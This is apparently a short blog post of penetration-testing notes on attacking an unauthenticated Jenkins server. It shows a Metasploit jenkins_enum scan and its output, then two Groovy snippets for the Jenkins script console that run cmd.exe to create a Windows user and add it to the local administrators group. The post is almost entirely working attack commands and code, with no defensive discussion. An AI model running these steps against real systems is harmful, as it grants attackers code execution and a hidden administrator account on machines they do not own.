control – jenkins

http://localhost:8080/

use auxiliary/scanner/http/jenkins_enum

set rhosts
set rport 8080
set targeturi /

run

[+] 192.168.56.103:8080 – /script does not require authentication (200)
[+] 192.168.56.103:8080 – /view/All/newJob does not require authentication (200)
[+] 192.168.56.103:8080 – /asynchPeople/ does not require authentication (200)
[+] 192.168.56.103:8080 – /systemInfo does not require authentication (200)
[*] Scanned 1 of 1 hosts (100% complete)

http://192.168.56.103:8080/script

Groovy script to add user to windows

To add a user

def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'cmd.exe /c net user test1 Password1 /ADD'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"

To add user to local admin

def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'cmd.exe /c net localgroup administrators test1 /add'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s